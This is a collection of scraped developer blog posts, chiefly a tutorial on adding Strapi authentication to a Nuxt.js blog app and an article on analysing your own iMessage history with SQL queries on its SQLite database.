Kotlin offers several options to enforce strong typing on one's APIs: enumerations, value classes, and sealed classes.
While most developers are pretty comfortable with enumerations, I'd advise considering value and sealed classes as they bring additional benefits to the table.
**To go further:**
* [Enum classes](https://kotlinlang.org/docs/enum-classes.html)
* [Inline classes](https://kotlinlang.org/docs/inline-classes.html)
* [Sealed classes](https://kotlinlang.org/docs/sealed-classes.html)
_Originally published at [A Java Geek](https://blog.frankel.ch/avoid-stringly-typed-kotlin/) on February 20<sup>th</sup>, 2022_
| nfrankel |
1,000,995 | Day-15 Training at cognizant | Date:25/02/2022 Day:Friday | 0 | 2022-02-25T06:13:53 | https://dev.to/mahin_mittal_/day-15-training-at-cognizant-1e3 | beginners, mysql | - Date:25/02/2022
- Day:Friday
| mahin_mittal_ |
1,005,407 | How to use the @nuxtjs/strapi Module to add Authentication to a Nuxt Application | Author: Alex Godwin How to use the @nuxtjs/strapi Module to add Authentication to a Nuxt... | 0 | 2022-03-01T15:55:10 | https://strapi.io/blog/how-to-use-the-nuxt-strapi-module-to-add-authentication-to-a-nuxt-application?utm_source=dev.to&utm_medium=post&utm_id=blog | nuxtjs, javascript, tutorial, jamstack | ---
canonical_url: https://strapi.io/blog/how-to-use-the-nuxt-strapi-module-to-add-authentication-to-a-nuxt-application?utm_source=dev.to&utm_medium=post&utm_id=blog
---
Author: Alex Godwin
# How to use the @nuxtjs/strapi Module to add Authentication to a Nuxt Application
In this tutorial, we will learn about authentication (local authentication) in Strapi. We’ll create a simple blog app where authenticated users can create, read, and delete posts. In contrast, unauthenticated users can only view a list of posts but cannot read, create, or delete posts. We’ll have a login route, signup route, and a create post route where users can create posts from. We’ll also be working with Image uploads to see how users can upload images from the Nuxt.js frontend to our Strapi backend.
## What do you need for this tutorial?
- Basic Knowledge of [Vue.js](https://vuejs.org)
- Knowledge of JavaScript, and
- [Node.js](https://nodejs.org) (v14 recommended for strapi).
## Table of Contents
- [Installing Strapi](http://strapi.io)
- Building the API with Strapi
- [Installing Nuxt.js](http://nuxtjs.org)
- [Installing @nuxtjs/strapi](https://strapi.nuxtjs.org)
- Building the frontend with Nuxt.js
Here’s what we’ll be building:




Let’s get started!
## Installing Strapi
[The Strapi documentation](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html) says that Strapi is a flexible, open-source, headless CMS that gives developers the freedom to choose their favourite tools and frameworks and allows editors to easily manage and distribute their content.
Strapi helps us build an API quickly with no hassle of creating a server from scratch. With Strapi, we can do everything literally, and it’s easily customizable. We can add our code and edit functionalities easily. Strapi is amazing, and its capabilities would leave you stunned.
Strapi provides an admin panel to edit and create APIs. It also provides easily-editable code and uses JavaScript.


To install Strapi, head over to the [Strapi installation docs](https://strapi.io/documentation/developer-docs/latest/installation/cli.html) and run the following commands:
```shell
yarn create strapi-app my-project # using yarn
npx create-strapi-app@latest my-project # using npx
```
Replace `my-project` with the name you wish to call your application directory. Your package manager will create a directory with the specified name and install Strapi.
If you followed the instructions correctly, you should have Strapi installed on your machine. Run the following command:
```shell
yarn develop # using yarn
npm run develop # using npm
```
This starts our development server; Strapi serves our app on http://localhost:1337/admin.
# Building the API with Strapi
We have Strapi up and running; the next step is to create our products content-type.
1. To Create the Article Content Type
- Click on `content-type` builder in the side menu.
- Under `Collection-types`, click `create new collection type`.
- Add new content-type named article.
- Create fields under article content-type.
- Name as short text
- Description as short text
- content as rich text
- Image as a single type.

2. Add User Relationship
- Create a relation field under article.
- Select `User` (from users-permissions-user), and click on “user has many articles” relation.
- Save the article content type.

3. Create User and Enable User Permission and Roles
- Strapi provides a Users collection type by default. Head to `settings` on the side menu, and select `Roles` under `Users and Permissions Plugin`.
- Click on `Authenticated` and check all permissions.
- Save your changes, then go back and click on `public`.
- Check only the `find` and `findOne` permissions.
- Click `save` to save changes.
- Create a user called `author` with whatever credentials you’d like, but select the authenticated role and enable email confirmation.
- Create an article and select `Users_permissions_user` as author. This means that the user `author` created the article.
- Save the article and proceed.
Save the `content-types`. We can now view our API in JSON format when we visit [http://localhost:1337/api/articles](http://localhost:1337/api/articles).
Now that we’ve created our Strapi API, we need to build our frontend with Nuxt.js.
## Installing Nuxt.js
To install Nuxt.js, visit [the Nuxt docs](https://nuxtjs.org/docs/2.x/get-started/installation).
We want to use Nuxt in SSR mode and server hosting; we also want Tailwind CSS as our preferred CSS framework. Select those and whatever options you want for the rest. Preferably, leave out C.I, commit-linting, and style-linting.
- To install Nuxt.js, run the following commands:
```shell
yarn create nuxt-app <project-name> # using yarn
npx create-nuxt-app <project-name> # using npx
npm init nuxt-app <project-name> # using npm
```
It will ask you some questions (Name, Nuxt Options, UI Framework, TypeScript, Linter, Testing Framework, etc.).
Once all the questions are answered, the dependencies will be installed. The next step is to navigate to the project folder and launch it using the command below.
```shell
yarn dev # using yarn
npm run dev # using npm
```
We should have Nuxt running on [http://localhost:3000](http://localhost:3000).
## Installing @nuxtjs/strapi
We need to query our Strapi backend API, and Strapi provides a great package for that. We could use [Nuxt’s native @nuxtjs/http module](https://http.nuxtjs.org) or [axios](https://www.npmjs.com/package/axios) to query our API, but [@nuxtjs/strapi](https://strapi.nuxtjs.org) makes it easier. To install @nuxtjs/strapi:
- Run the command below:
```shell
yarn add @nuxtjs/strapi@^0.3.4 # using yarn
npm install @nuxtjs/strapi@^0.3.4 # using npm
```
- Open the `nuxt.config.js` file and add the following code to the file.
```js
modules: [
// ...other modules
'@nuxtjs/strapi',
],
strapi: {
url: process.env.STRAPI_URL || `http://localhost:1337/api`,
entities: ['articles'],
}
```
We can now use @nuxtjs/strapi to make API calls and continue building our pages and components.
The @nuxtjs/strapi documentation can be found [here](https://strapi.nuxtjs.org/).
- We’ll be using @nuxtjs/strapi in two ways:
  - `this.$strapi`: from properties such as methods, data, computed
  - `$strapi`: from Nuxt.js lifecycle methods
## Installing [@nuxtjs/markdownit](https://www.npmjs.com/package/@nuxtjs/markdownit)
Strapi rich text gives us the privilege of writing markdown in our content. In order to parse the markdown content from the backend, we need to [install the @nuxtjs/markdownit package](https://www.npmjs.com/package/@nuxtjs/markdownit).
- Run the command below.
```shell
yarn add @nuxtjs/markdownit # using yarn
npm install @nuxtjs/markdownit # using npm
```
- Add the following lines of code to your nuxt.config.js file.
```js
modules: [
//...other modules
'@nuxtjs/markdownit'
],
markdownit: {
preset: 'default',
linkify: true,
breaks: true,
injected: true,
// use: ['markdown-it-div', 'markdown-it-attrs'],
},
```
Now, we can use @nuxtjs/markdownit to parse our markdown content. The @nuxtjs/markdownit documentation can be found [here](https://www.npmjs.com/package/@nuxtjs/markdownit).
## Building the Frontend with NuxtJs
We can proceed with building the user-interface of our blog app.
**To Build the Signup Page:**
- Execute the following lines of code to create a `signup.vue` file in the pages directory.
```shell
cd pages
touch signup.vue
```
- Fill signup.vue with the following lines of code.
```vue
<template>
<div class="w-4/5 mx-auto md:w-1/2 text-center my-12">
<div v-show="error !== ''" class="p-3 border">
<p>{{ error }}</p>
</div>
<h1 class="font-bold text-2xl md:text-4xl mt-5">Signup</h1>
<form @submit="createUser">
<div>
<input
v-model="email"
class="p-3 my-5 border w-full"
type="email"
placeholder="email"
/>
</div>
<div>
<input
v-model="username"
class="p-3 my-5 border w-full"
type="text"
placeholder="username"
/>
</div>
<div>
<input
v-model="password"
class="p-3 my-5 border w-full"
type="password"
placeholder="password"
/>
</div>
<div>
<button
class="button--green"
:disabled="email === '' || password === '' || username === ''"
type="submit"
>
Signup
</button>
</div>
</form>
</div>
</template>
<script>
export default {
data() {
return {
email: '',
username: '',
password: '',
error: '',
}
},
methods: {
async createUser(e) {
e.preventDefault()
try {
const newUser = await this.$strapi.register({
email: this.email,
username: this.username,
password: this.password,
})
console.log(newUser)
if (newUser !== null) {
this.error = ''
this.$nuxt.$router.push('/articles')
}
} catch (error) {
this.error = error.message
}
},
},
middleware: 'authenticated',
}
</script>
<style></style>
```
We just built our signup logic: when users provide their email, username, and password and click the signup button, we invoke the `createUser` method. All we’re doing in this method is registering a new user using the `@nuxtjs/strapi` module, i.e., the `this.$strapi.register()` method. Then, we redirect the user to the `/articles` route. If the email belongs to an existing user, an error message is displayed at the top of the page. Finally, we’re using the Nuxt.js middleware feature to invoke a custom-made middleware that we’re going to create.
**To Build the Login Page**
- Execute the following lines of code to create a `login.vue` file in the pages directory.
```shell
touch login.vue
```
- Fill up login.vue with the following lines of code.
```vue
<template>
<div class="w-4/5 mx-auto md:w-1/2 text-center my-12">
<div v-show="error !== ''" class="p-3 border">
<p>{{ error }}</p>
</div>
<h1 class="font-bold text-2xl md:text-4xl mt-5">Login</h1>
<form @submit="loginUser">
<div>
<input
v-model="identifier"
class="p-3 my-5 border w-full"
type="email"
placeholder="email"
/>
</div>
<div>
<input
v-model="password"
class="p-3 my-5 border w-full"
type="password"
placeholder="password"
/>
</div>
<div>
<button
:disabled="identifier === '' || password === ''"
class="button--green"
type="submit"
>
Login
</button>
</div>
</form>
</div>
</template>
<script>
export default {
data() {
return {
identifier: '',
password: '',
error: '',
}
},
methods: {
async loginUser(e) {
e.preventDefault()
try {
const user = await this.$strapi.login({
identifier: this.identifier,
password: this.password,
})
console.log(user)
if (user !== null) {
this.error = ''
this.$nuxt.$router.push('/articles')
}
} catch (error) {
this.error = 'Error in login credentials'
}
},
},
middleware: 'authenticated',
}
</script>
<style></style>
```
We’ve just built our login logic: users provide a unique identifier (email) and password, then click the login button, which calls the `loginUser` method. This method attempts to log the user in using the `@nuxtjs/strapi` module's `this.$strapi.login()` method, and returns a user object if a user is found or an error if the credentials are invalid. The user is redirected to the `/articles` route if the process succeeds, and an error message is displayed if an error occurred.
**To Create an Authenticated Middleware**
Let’s create our middleware function:
- Execute the following lines of code to create an authenticated.js file in the middleware directory.
```shell
cd middleware
touch authenticated.js
```
- Fill up authenticated.js with the following code.
```js
export default function ({ $strapi, redirect }) {
if ($strapi.user) {
redirect('/articles')
}
}
```
What we have done is set up a middleware that checks whether a user is logged in. If a user is logged in, we redirect them to the `/articles` page. This middleware is useful for preventing a logged-in user from accessing the login, signup, and `/` routes; we don’t want a logged-in user signing up on our app for any reason.
**To Build the Nav Component**
- Execute the following lines of code to create a `Nav.vue` file in the components directory.
```shell
cd components
touch Nav.vue
```
- Fill up the file with the following code.
```vue
<template>
<div
class="flex space-x-5 items-center justify-center bg-black text-white py-3 sm:py-5"
>
<NuxtLink to="/articles">Articles</NuxtLink>
<div v-if="$strapi.user === null">
<NuxtLink class="border-r px-3" to="/login">Login</NuxtLink>
<NuxtLink class="border-r px-3" to="/signup">Signup</NuxtLink>
</div>
<div v-if="$strapi.user !== null">
<span class="border-r px-3">{{ $strapi.user.username }}</span>
<NuxtLink class="border-r px-3" to="/new">Create Post</NuxtLink>
<button class="pl-3" @click="logout">Logout</button>
</div>
</div>
</template>
<script>
export default {
name: 'Nav',
methods: {
async logout() {
await this.$strapi.logout()
this.$nuxt.$router.push('/')
},
},
}
</script>
<style></style>
```
In the *Nav* component, all we’re doing is building a navigation bar for our application. Using the `@nuxtjs/strapi` module, we check whether there is a logged-in user: if not, we display signup and login options in the nav bar; if a user is logged in, we display their username, a logout option, and a "Create Post" link.
Note:
```js
$strapi.user // returns the logged-in user or null
```
When a user clicks the logout button, we invoke the `logout` method, which in turn calls `this.$strapi.logout()` to log the user out. Then we redirect the user to the `/` route using the `$nuxt.$router.push()` method.
**To Build the Homepage**
- Execute the following lines of code to create an `index.vue` file in the pages directory.
```shell
cd pages
code index.vue
```
- Fill up the index.vue file with the following code.
```vue
<template>
<div class="container">
<div>
<h1 class="title">Welcome To The BlogApp</h1>
<div class="links">
<NuxtLink to="/login" class="button--green"> Login </NuxtLink>
<NuxtLink to="/articles" class="button--grey"> Continue Free </NuxtLink>
</div>
</div>
</div>
</template>
<script>
export default {
middleware: 'authenticated',
}
</script>
<style>
/* Sample `apply` at-rules with Tailwind CSS
.container {
@apply min-h-screen flex justify-center items-center text-center mx-auto;
}
*/
.container {
margin: 0 auto;
min-height: 100vh;
display: flex;
justify-content: center;
align-items: center;
text-align: center;
}
.title {
font-family: 'Quicksand', 'Source Sans Pro', -apple-system, BlinkMacSystemFont,
'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
display: block;
font-weight: 300;
font-size: 80px;
color: #35495e;
letter-spacing: 1px;
}
.subtitle {
font-weight: 300;
font-size: 42px;
color: #526488;
word-spacing: 5px;
padding-bottom: 15px;
}
.links {
padding-top: 15px;
}
</style>
```
What we have here is our homepage. We’re using the Nuxt.js middleware feature to invoke the custom `authenticated` middleware we created earlier.
**To Build the Articles Page**
- Execute the following lines of code to create an `articles.vue` file in the pages directory.
```shell
cd pages
touch articles.vue
```
- Fill it up with the following code.
```vue
<template>
<div>
<Nav class="mx-auto sticky top-0" />
<h1 class="text-center my-5">All our articles</h1>
<div
v-show="error !== ''"
class="sticky z-100 border p-5 m-3 top-0 bg-black text-white text-center mx-auto w-4/5 sm:w-4/5 md:w-4/5 lg:w-1/2"
>
<p class="m-1 sm:m-3">{{ error }}</p>
<button class="button--grey" @click="resetError()">Ok</button>
</div>
<div
v-for="(article, i) in data.data"
:key="i"
class="sm:flex sm:space-x-5 my-5 shadow-lg mx-auto w-4/5 sm:w-4/5 md:w-4/5 lg:w-1/2"
>
<img
:src="`http://localhost:1337${article.attributes.Image.data.attributes.formats.small.url}`"
class="max-h-screen sm:h-48"
/>
<div class="px-2 sm:pr-2 sm:text-left text-center">
<h3 class="font-bold my-3">{{ article.attributes.name }}</h3>
<p class="my-3">{{ article.attributes.description }}</p>
<button class="button--green mb-4 sm:mb-0" @click="readPost(article)">
Read more
</button>
</div>
</div>
</div>
</template>
<script>
export default {
async asyncData({ $strapi, $md }) {
const data = await $strapi.$articles.find({ populate: '*' })
return { data }
},
data() {
return {
error: '',
}
},
methods: {
readPost(article) {
if (this.$strapi.user) {
this.error = ''
this.$nuxt.$router.push(`/article/${article.id}`)
} else {
this.error = 'Please Login to read articles'
}
},
resetError() {
this.error = ''
},
},
}
</script>
<style></style>
```
First, we use the `@nuxtjs/strapi` module to find all our articles, then display them on the page. In the `readPost` method, we check whether a user is logged in before allowing them to read a post. If the user is not logged in, we display the error message "Please Login to read articles".
**To Build the Article Content Page**
- Execute the following lines of code to create an `_id.vue` file in an `article` subdirectory of the pages directory.
```shell
mkdir article
touch article/_id.vue
```
- Fill the _id.vue file with the following code.
```vue
<template>
<div>
<Nav class="mx-auto sticky top-0" />
<div class="w-4/5 sm:w-1/2 mx-auto my-5">
<h3 class="my-5 font-bold text-4xl">
{{ article.name }}
</h3>
<img
:src="`http://localhost:1337${article.Image.url}`"
class="max-h-screen"
/>
<p class="mt-5 font-bold">
written by {{ article.users_permissions_user.username }}
</p>
<div class="my-5" v-html="$md.render(article.content)"></div>
<button
v-if="
$strapi.user && article.users_permissions_user.id === $strapi.user.id
"
class="button--grey"
@click="deletePost(article.id)"
>
Delete
</button>
</div>
</div>
</template>
<script>
export default {
async asyncData({ $strapi, route }) {
const id = route.params.id
const article = await $strapi.$articles.findOne(id, {
populate: '*',
})
return { article }
},
methods: {
async deletePost(id) {
await this.$strapi.$articles.delete(id)
this.$nuxt.$router.push('/articles')
},
},
middleware({ $strapi, redirect }) {
if ($strapi.user === null) {
redirect('/articles')
}
},
}
</script>
<style scoped>
h1 {
font-weight: 700;
font-size: 2rem;
margin: 0.5em 0;
}
</style>
```
On this page, we display an individual article with its complete content (rendered with markdown-it via `$md.render(article.content)`), the author's name, and more. We also display a delete button if the current user is the author of the post, which we check using the `@nuxtjs/strapi` module; we don’t want an unauthorized user to delete a post they didn’t create. Finally, in the middleware, we check for a logged-in user; if there is none, we redirect to the `/articles` route, making the article content page totally inaccessible to unauthenticated users.
**NOTE:**
The `Users_permissions` plugin is currently broken, but we can populate the `users_permissions_user` field manually from the Strapi backend. Follow the steps below to do so:
- Navigate to the `src/api/article/controllers` folder.
- Click on the `article.js` file.
- Fill it up with the following code.
```js
'use strict';
/**
* article controller
*/
const { createCoreController } = require('@strapi/strapi').factories;
module.exports = createCoreController('api::article.article', ({ strapi }) => ({
async findOne(ctx) {
console.log(ctx.request.params.id)
const data = await strapi.service('api::article.article').findOne(ctx.request.params.id, {
populate: ['Image', 'users_permissions_user']
})
delete data.users_permissions_user.password
return data
}
}));
```
What we’ve done is manually populate the `Image` and `users_permissions_user` fields, then delete the password so that it is not passed along in the response to the client.
**To Build the Create Article Page**
- Execute the following lines of code to create a `new.vue` file in the pages directory (lowercase, so that Nuxt generates the `/new` route our nav links to).
```shell
touch new.vue
```
- Fill up the `new.vue` file with the following lines of code.
```vue
<template>
<div class="w-4/5 mx-auto md:w-1/2 text-center my-12 overflow-hidden">
<form ref="form" @submit="createPost">
<h2 class="font-bold text-2xl md:text-4xl mt-5">Create a new post</h2>
<div>
<input
v-model="form.name"
name="Title"
type="text"
placeholder="title"
class="p-3 my-3 border w-full"
/>
</div>
<div>
<input
v-model="form.description"
name="description"
type="text"
placeholder="description"
class="p-3 my-3 border w-full"
/>
</div>
<div>
<textarea
v-model="form.content"
name="Content"
cols="30"
rows="10"
class="p-3 my-3 border w-full"
></textarea>
</div>
<div>
<input
type="file"
name="Image"
class="p-3 my-3 border w-full"
@change="assignFileInput()"
/>
</div>
<div>
<button
class="button--green"
:disabled="
form.name === '' ||
form.description === '' ||
form.content === '' ||
fileInput === ''
"
type="submit"
>
Create
</button>
</div>
</form>
</div>
</template>
<script>
export default {
data() {
return {
form: {
name: '',
description: '',
content: '',
users_permissions_user: this.$strapi.user.id,
},
fileInput: '',
}
},
methods: {
async createPost(e) {
const formData = new FormData()
let file
const formElements = this.$refs.form.elements
formElements.forEach((el, i) => {
if (el.type === 'file') {
file = el.files[0]
}
})
formData.append(`files.Image`, file, file.name)
formData.append('data', JSON.stringify(this.form))
e.preventDefault()
await this.$strapi.$articles.create(formData)
this.$nuxt.$router.push('/articles')
},
assignFileInput() {
const formElements = this.$refs.form.elements
formElements.forEach((el, i) => {
if (el.type === 'file') {
this.fileInput = el.files[0] !== undefined ? el.files[0].name : ''
}
})
},
},
middleware({ $strapi, redirect }) {
if (!$strapi.user) {
redirect('/articles')
}
},
}
</script>
<style></style>
```
We just created the logic to enable authenticated users to create new articles. The logic is complicated, especially the *file upload* logic, so let’s work through it step by step.
We built a content creation form as usual, with fields for title, description, image upload and content, and the create button.
1. Using the `v-model` directive, we linked up the fields with their respective data properties; file inputs do not support `v-model`, so we’ve built a workaround.
2. We created an `assignFileInput()` method that is invoked whenever the file input changes.
3. When a change occurs, we check whether the form element that changed is of type `file`. If it is, we assign the name of the selected file as the value of `fileInput`.
Next, the `createPost()` method allows users to create articles.
1. Using `FormData`, we append the page's `form` object, serialized with `JSON.stringify()`, under a `data` key.
2. We do the same for the file input, but append it under a `files.Image` key. This is because, for multipart data, Strapi requires that the property be prefixed with `files`, i.e. `files.${fieldName}`, and the field name from our article content-type is `Image`.
With all that done, we should have our create article logic working fine.
[The frontend repo for this tutorial can be found here](https://github.com/oviecodes/nuxt-strapi-auth)
[The backend repo for this tutorial can be found here](https://github.com/oviecodes/strapi-auth/tree/strapi-v4).
We’ve come to the end of this tutorial. You now have what it takes to tackle Strapi authentication with Nuxt.js.
| shadaw11 |
1,005,679 | Analyzing iMessage with SQL | SQLite is an often overlooked flavor of SQL engines. Some have suggested it is the most prolific SQL... | 0 | 2022-03-01T18:36:10 | https://arctype.com/blog/search-imessage | database, tutorial, programming, sqlite | SQLite is an often overlooked flavor of SQL engines. Some have suggested it is the most prolific SQL engine in existence due to its highly flexible nature and ability to run on almost any platform with limited resources. Unlike other SQL engines like MySQL, PostgreSQL, MSSQL, or Oracle, SQLite runs without a server. SQLite does not rely on a data directory or a constantly running daemon: a database is encapsulated in a single file.
## SQLite and iMessage
iMessage is one of the most [popular messaging platforms](https://techplanet.today/post/why-imessage-is-so-popular) today, largely because it is built into iOS and Mac devices. Since its release, it has evolved significantly. But, at its core, it is simply an instant messaging platform. iMessage uses SQLite in the background to store relational data about messages, conversations, and their participants.
As a long-time Apple user, I have backed up and transferred my iPhone data since my first time using an iPhone, which was November 10, 2009. Because I have been digitally hoarding my text data for so long, my iMessage database is nearly 1GB in size.
Until a few years ago, the built-in search feature for iMessage was [very limited and buggy](https://pxlnv.com/linklog/messages-search/). Although it has recently improved significantly, it is, like nearly any end-user tool, very limited in how you can query it. Those of us who frequently work with data that is trapped behind a limited front-end often wish we could get direct access to the SQL database. Fortunately, the iMessage database is not inaccessible - in fact, it is very easy to access.
### Finding the iMessage SQL Database
#### On Your Mac
If you have iMessage enabled on your Mac as well as your iPhone, you have 2 different databases from which to choose. The database on your Mac is very easy to find, as it is simply under `~/Library/Messages/chat.db`. If you do not use your Mac for iMessage, or, as in my case, your Mac iMessages do not go as far back, you can extract your iPhone's database by performing a backup to your Mac.
#### On Your iPhone
Follow these instructions to extract your iPhone's iMessage database:
1. Open Finder and select your iPhone under "Locations".
2. Find the "Backups" section and select "Back up all of the data on your iPhone to this Mac", then press Back Up Now to immediately create a new backup. This process may take a while.
3. Once it is complete, you will find the SQLite file under `/Users/[username]/Library/Application Support/MobileSync/Backup/[backup name]/3d/3d0d7e5fb2ce288813306e4d4636395e047a3d28`.
4. If you plan to open this database with Arctype, you'll want to copy and rename the file with a `.db` extension to indicate that it is a SQLite file.
## Getting Started with SQLite
Unlike most SQL servers, you do not need a connection string, host, or username to connect to a SQLite database. All you need to do is point your SQL client to the database file. [Arctype](https://arctype.com) makes it simple and convenient to load SQLite databases within the same workspace as your other connections.
### With Arctype

1. Under the Connections dropdown, select "Add new data source"
2. Select "SQLite"
3. Find the SQLite database file. The file must have a .sqlite3 or .db extension for Arctype to open it.
More detailed instructions can be found in the [Arctype Docs](https://docs.arctype.com/connect/postgresql).
### With Command Line
From a UNIX terminal, type `sqlite3 [filename]`.
## iMessage Schema
One of my favorite parts about Arctype is how easy it is to analyze database schema. I'm a long-time user of command-line tools and old-school editors, but sometimes having a more visually interactive tool is a lifesaver. Let's dig into the schema Apple has created for iMessage. Today we will focus on the `chat`, `message`, and `handle` tables, as well as a few join tables to connect related records.

Note that I have created a custom view called `handle2` which adds a field `id2` that obfuscates the phone numbers and email addresses of my personal contacts, and you will see this view referenced in the examples in this article.
## Digging Into iMessage
Let's write some queries and makes some observations that would not be possible without direct SQL access.
### Pique Your Nostalgia with Old Messages
To get started, let's begin with a simple query to view your first 50 messages. If you have chat threads that go back years and years, there is no easy way to access early messages from your iPhone or Mac.
The interface on both platforms requires you to scroll back by about 25 messages at a time. This is prohibitively time-consuming and can result in a crash or reset if the user sends you a new message while you're scrolled back.
Fortunately, we have custom SQL to save us:
```
select
h.id2 as sender_name,
m.text as message_body
from
message m
join handle2 h on h.rowid = m.handle_id
order by
m.date
limit
50;
```

`handle.id` represents the readable identifier for the user. It will be either a phone number or an email address.
### Rate Your Friendships with SQL
Let's use SQL to find out who our best friends are. Assuming you view the quality of friendships as a function of the quantity of sent text messages, this should be very accurate!
First, let's compare the number of messages where `is_from_me` is set against the total to produce a reply ratio. This query shows the top 10 people we have been messaging by total message count, along with the percentage of those messages that we sent.
Multiplication by 1.0 casts to the `REAL` data type to avoid integer division, which would result in 1 or 0 instead of a decimal. You can use the link [here](https://datacomy.com/sql/sqlite/division/) to see the rules for integer division in SQLite.
```
select
h.id2,
count(1) as cnt,
round(
sum(
case
when m.is_from_me then 1
else 0
end
) * 1.0 / count(1) * 100.0,
2
)
from
message m
join handle2 h on h.rowid = m.handle_id
group by
h.id
order by
cnt desc
limit
10;
```

One issue with this analysis is that fewer sent messages does not necessarily imply fewer words sent. Let's add some more fields to get a better insight.
Here we can see the total amount of characters sent and received, the average length of text message sent and received, the total ratio of characters sent and received, and the reply ratio. In my case, people from whom I tend to receive more messages also send longer messages than me.
```
select
h.id,
count(1) as cnt,
sum(length(m.text)) as chars,
sum(length(m.text)) filter (where m.is_from_me) as chars_sent,
sum(length(m.text)) filter (where not m.is_from_me) as chars_received,
round(avg(length(m.text)) filter (where m.is_from_me)) as avg_length_sent,
round(avg(length(m.text)) filter (where not m.is_from_me)) as avg_length_received,
round((sum(length(m.text)) filter (where m.is_from_me) * 1.0 / sum(length(m.text)) filter (where not m.is_from_me)), 2) as characters_sent_ratio,
round((count(1) filter (where m.is_from_me)) * 1.0 / (count(1) filter (where not m.is_from_me)), 2) as reply_ratio
from
message m
join handle h on h.rowid = m.handle_id
group by
h.id
order by
cnt desc
limit
10;
```

This query makes heavy use of [aggregate filters](https://modern-sql.com/feature/filter). Aggregate filters allow you to use an aggregate function on only a part of the data by specifying a `WHERE` clause to filter out unwanted records.
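Aggregate filters are easy to experiment with outside the iMessage database, provided your SQLite build is 3.30 or newer. Here is a small sketch using Python's built-in `sqlite3` module and a toy table (the column name mirrors the real `message` table, but the data is made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
create table msg (is_from_me integer, text text);
insert into msg values (1, 'hey'), (0, 'hello there'), (1, 'ok');
""")
# Each FILTER clause restricts its aggregate to the matching rows,
# so one pass over the table yields both sent and received counts.
sent, received = conn.execute("""
    select
        count(*) filter (where is_from_me),
        count(*) filter (where not is_from_me)
    from msg
""").fetchone()
print(sent, received)  # 2 1
conn.close()
```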
### Examining iMessage Reactions
There are 2 newer iMessage features whose implementations, in the context of their schema design, are interesting to look into. Recently [an announcement was made](https://www.droid-life.com/2022/01/31/imessage-reactions-google-android/) that Android phones will be able to show iMessage "reactions" properly. Historically, if you send an iMessage reaction to a non-Apple device, it will show up as a textual addition instead of an icon.

With the announcement of the new compatibility with Android devices, I was curious to learn how the current implementation of the feature works.
I `SELECT`ed a few records with and without a reaction and compared the results. I discovered that the `associated_message_type` column was usually set to 0, but in messages with a reaction, it was an integer value between 2000 and 2005. I also noticed that `associated_message_guid` was present. Apple appears to be using 2000-2005 for its six reaction types, 3000-3005 for when a user removes a reaction, and 3 for an Apple Pay request.

From this investigation, it appears that reactions are sent as iMessages with the reaction's textual equivalent appended and a foreign key relation to the parent message. This allows the messages to seamlessly be sent and received by non-Apple devices.
If the message is sent over SMS, the metadata linking the reaction to the message it references is simply lost. If the device is iMessage capable, Apple devices will ignore the `text` part of the message, find the associated message and add the proper reaction as a visual overlay.
Note that the `message` table includes both a `ROWID` and a `guid`. `ROWID` is a typical auto-increment integer `id` field, which is useful for joining on within the local database. However, the auto-incremented primary key will not be the same for the same message across devices. The `GUID` is globally unique, generated by the author of the message, and sent to all of its recipients. This allows foreign key references across different databases, devices, and users. For more information about the utility of GUIDs, check out [this article](__GHOST_URL__/postgres-uuid/).
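To make the reaction linkage concrete, here is a small self-contained mock-up using Python's built-in `sqlite3` module. The toy table below keeps only a few columns of the real `message` table, and the reaction row stores its parent's `guid` directly (in an actual `chat.db`, the `associated_message_guid` value may carry an additional prefix):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
create table message (
    ROWID integer primary key,
    guid text,
    text text,
    associated_message_type integer default 0,
    associated_message_guid text
);
-- an ordinary message
insert into message (guid, text) values ('ABC-123', 'Pizza tonight?');
-- a reaction: type 2000-2005 encodes the tapback, guid points at the parent
insert into message (guid, text, associated_message_type, associated_message_guid)
    values ('DEF-456', 'Loved "Pizza tonight?"', 2000, 'ABC-123');
""")
# Join each reaction row back to the message it reacts to
rows = conn.execute("""
    select parent.text, reaction.associated_message_type
    from message reaction
    join message parent on parent.guid = reaction.associated_message_guid
    where reaction.associated_message_type between 2000 and 2005
""").fetchall()
print(rows)  # [('Pizza tonight?', 2000)]
conn.close()
```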
### Find Your Most Popular Group Chats
Group chats are stored in the `chat` table. The join tables `chat_handle_join` and `chat_message_join` associate users and messages, respectively, with group chats. Here's a query to find our most-used group chats (chats with more than one member) and the identities of their participants.
```
select
group_concat(distinct h.id2) as participants,
count(m."ROWID") as message_count
from
chat c
join chat_handle_join chj on chj.chat_id = c."ROWID"
join handle2 h on h."ROWID" = chj.handle_id
join chat_message_join cmj on cmj.chat_id = c."ROWID"
join message m on m."ROWID" = cmj.message_id
group by
c."ROWID"
having
count(distinct h.id) > 1
order by
message_count desc
limit
10;
```


The `group_concat` function, which is familiar from MySQL by the same name and familiar to PostgreSQL users as `string_agg`, is an aggregate function that concatenates strings together. See more on how it can be used within SQLite [here](https://www.sqlite.org/lang_aggfunc.html#group_concat).
The `HAVING` clause is similar to a `WHERE` clause but operates on aggregate functions. If you've wanted to write a query conditional on an aggregate but are not able to inside of your `WHERE` clause, `HAVING` is [there for you](https://www.sqlitetutorial.net/sqlite-having/).
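Both features can be tried in isolation. Here is a minimal, self-contained illustration (Python's built-in `sqlite3` module with a made-up membership table, not the real iMessage schema):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
create table chat_member (chat_id integer, member text);
insert into chat_member values
    (1, 'alice'), (1, 'bob'), (1, 'carol'),  -- a group chat
    (2, 'dave');                             -- a one-on-one chat
""")
# group_concat glues each chat's member names together, while HAVING
# filters on the aggregate count to keep only multi-member chats.
rows = conn.execute("""
    select chat_id, group_concat(member, ', ') as participants
    from chat_member
    group by chat_id
    having count(*) > 1
""").fetchall()
print(rows)  # only chat 1 survives the HAVING filter
conn.close()
```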
## Conclusion
SQLite is a powerful tool whose prolific reach across devices and numerous use cases make it one of the most impressive software projects around. If you're curious about what's behind the scenes, SQLite's [source code](https://sqlite.org/src/doc/trunk/README.md) is well known to be well-organized and fun (well, to some of us) to peek into.
iMessage is just one of many pieces of software that rely on SQLite and are used by millions of end-users. You can try out a SQL client [like Arctype](https://arctype.com) for free and start exploring the databases that power the tools you use daily! | rettx |
